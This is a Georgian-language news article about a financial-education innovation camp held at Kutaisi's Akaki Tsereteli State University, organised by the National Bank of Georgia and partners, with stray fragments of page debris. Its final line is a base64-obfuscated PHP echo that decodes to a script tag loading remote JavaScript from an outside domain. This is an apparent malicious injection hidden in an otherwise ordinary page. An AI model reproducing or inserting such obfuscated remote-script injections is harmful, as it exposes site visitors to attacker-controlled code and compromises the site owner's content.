celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნული ბანკის, საგანმანათლებლო პლატფორმა "ფინედუს“,  ჯუნიორ ეჩივმენტ საქართველოს ორგანიზებით და ბაზისბანკის ფინანსური მხარდაჭერით, ქუთაისის აკაკი წერეთლის სახელმწიფო უნივერსიტეტმა, ფინანსური განათლების ამაღლების თემაზე, ინოვაციების ბანაკს უმასპინძლა.

ღონისძიება USAID-ის პროექტის - "სამეწარმეო განათლების მხარდაჭერა ევროპასა და ევრაზიაში" ფარგლებში, უკვე მეექვსედ ჩატარდა, რომელშიც მოსწავლე-ახალგაზრდების 10 გუნდმა, 12 საათის განმავლობაში, კონკრეტული გამოწვევის საპასუხო ბიზნესპროექტი დაამუშავა.
 
ინოვაციების ბანაკის მონაწილეების ამოცანა იყო, ემიგრანტებისა და მათი ოჯახის წევრების ფინანსური განათლების ამაღლებისა და მათი მეწარმეობაში ჩართვის ხელშეწყობა. ბანაკის მონაწილეებს, სიტუაციურ დავალებასთან მუშაობისას, კონსულტაცია გაუწიეს საბანკო-საფინანსო სფეროს, მათ შორის ბაზისბანკის, მოწვეულმა ექსპერტებმა. ეროვნული ბანკის წარმომადგენელმა კი ახალგაზრდებს  ფინანსური განათლების საჭიროებისა და მნიშვნელობის შესახებ პრეზენტაცია წარუდგინა.
 
ჟიურის გადაწყვეტილებით, ინოვაციების ბანაკის გამარჯვებულად დასახელდა გუნდი - Human Inteligence.
ღონისძიების გამარჯვებულებსა და მონაწილეებს საერთაშორისოდ აღიარებული სერტიფიკატები და ბაზისბანკის სახელით ბრენდირებული საჩუქრები გადაეცათ.
 
საქართველოს ეროვნული ბანკის საგანმანათლებლო პლატფორმაზე - FinEdu.gov.ge კი  თავმოყრილია ფინანსური განათლების თემაზე არსებული ყველა საჭირო ინფორმაცია.
 
(რ)
372
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");